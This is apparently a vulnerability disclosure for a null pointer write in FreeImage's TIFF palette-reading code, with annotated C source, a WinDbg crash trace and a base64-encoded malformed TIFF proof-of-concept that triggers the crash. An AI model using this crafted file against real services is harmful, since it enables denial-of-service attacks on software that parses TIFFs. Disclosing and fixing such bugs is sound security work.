In ReadPalette function, it call FreeImage\_GetPalette() to get variable "pal", then write to variable "pal" without check.

static void 
ReadPalette(TIFF \*tiff, uint16\_t photometric, uint16\_t bitspersample, FIBITMAP \*dib) {
    RGBQUAD \*pal \= FreeImage\_GetPalette(dib);               // <---- get pal (maybe null)

    switch(photometric) {                                   // <---- write pal every case
        case PHOTOMETRIC\_MINISBLACK:    // bitmap and greyscale image types
        case PHOTOMETRIC\_MINISWHITE:
            // Monochrome image

            if (bitspersample \== 1) {
                if (photometric \== PHOTOMETRIC\_MINISWHITE) {
                    pal\[0\].rgbRed \= pal\[0\].rgbGreen \= pal\[0\].rgbBlue \= 255;         //<---- write
                    pal\[1\].rgbRed \= pal\[1\].rgbGreen \= pal\[1\].rgbBlue \= 0;
                } else {
                    pal\[0\].rgbRed \= pal\[0\].rgbGreen \= pal\[0\].rgbBlue \= 0;          //<---- write
                    pal\[1\].rgbRed \= pal\[1\].rgbGreen \= pal\[1\].rgbBlue \= 255;
                }

            } else if ((bitspersample \== 4) ||(bitspersample \== 8)) {
                // need to build the scale for greyscale images
                int ncolors \= FreeImage\_GetColorsUsed(dib);

                if (photometric \== PHOTOMETRIC\_MINISBLACK) {
                    for (int i \= 0; i < ncolors; i++) {
                        pal\[i\].rgbRed   \=                                        //<---- write
                        pal\[i\].rgbGreen \=
                        pal\[i\].rgbBlue  \= (BYTE)(i\*(255/(ncolors\-1)));
                    }
                } else {
                    for (int i \= 0; i < ncolors; i++) {
                        pal\[i\].rgbRed   \=                                        //<---- write
                        pal\[i\].rgbGreen \=
                        pal\[i\].rgbBlue  \= (BYTE)(255\-i\*(255/(ncolors\-1)));
                    }
                }
            }

            break;

        case PHOTOMETRIC\_PALETTE:   // color map indexed
            uint16\_t \*red;
            uint16\_t \*green;
            uint16\_t \*blue;

            TIFFGetField(tiff, TIFFTAG\_COLORMAP, &red, &green, &blue); 

            // load the palette in the DIB

            if (CheckColormap(1<<bitspersample, red, green, blue) \== 16) {
                for (int i \= (1 << bitspersample) \- 1; i \>= 0; i\--) {
                    pal\[i\].rgbRed \=(BYTE) CVT(red\[i\]);                             //<---- write
                    pal\[i\].rgbGreen \= (BYTE) CVT(green\[i\]);
                    pal\[i\].rgbBlue \= (BYTE) CVT(blue\[i\]);
                }
            } else {
                for (int i \= (1 << bitspersample) \- 1; i \>= 0; i\--) {
                    pal\[i\].rgbRed \= (BYTE) red\[i\];                                 //<---- write
                    pal\[i\].rgbGreen \= (BYTE) green\[i\];
                    pal\[i\].rgbBlue \= (BYTE) blue\[i\];
                }
            }

            break;
    }
}

function FreeImage\_GetPalette() maybe return NULL.

FreeImage\_GetPalette(FIBITMAP \*dib) {
    return (dib && FreeImage\_GetBPP(dib) < 16) ? (RGBQUAD \*)(((BYTE \*)FreeImage\_GetInfoHeader(dib)) + sizeof(BITMAPINFOHEADER)) : NULL;
}

unsigned DLL\_CALLCONV
FreeImage\_GetBPP(FIBITMAP \*dib) {
    return dib ? FreeImage\_GetInfoHeader(dib)\->biBitCount : 0;
}

Variable biBitCount is calc by "bitspersample" and "samplesperpixel" in function "CreateImageType", and these two variable are read from file.  
So if variable biBitCount less than 16, FreeImage will try to write nullptr. It allows an attacker to cause Denial of Service.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(17dc.5d5c): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=2b110000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=0095f420 ebp\=0095f44c iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(17dc.5d5c): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=000000ff ebx\=069ceff8 ecx\=00000000 edx\=00000000 esi\=00000000 edi\=00000000
eip\=10034fbc esp\=0095f63c ebp\=00000000 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010246
FreeImage!\_TIFFmemcmp+0x3fc:
10034fbc 884500          mov     byte ptr \[ebp\],al          ss:002b:00000000\=??
0:000\> kv
 \# ChildEBP RetAddr      Args to Child
00 0095f658 10037780     00000001 00000010 06982fc8 FreeImage!\_TIFFmemcmp+0x3fc (FPO: \[Uses EBP\] \[2,5,4\])
01 0095f8a0 1000d9de     0095f8f4 06982fc8 00000010 FreeImage!\_TIFFmemcmp+0x2bc0 (FPO: \[5,139,3\])
02 0095f8d4 1000da60     00000012 0095f8f4 06982fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
03 0095f900 00b0107b     00000012 0697efee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/tiff;base64,SUkqAAgAAAAHAAABAwABAAAAIAAAAAEBAwABAAAAIAAAABcBBAAMAAAACAAAABEBBAAEAAAACAAAABYBAwABAAAAAAQAABUBAwABAAAAEAAAAEMBAwABAAAAAQAAAAAAAAA\=

Tag

#dos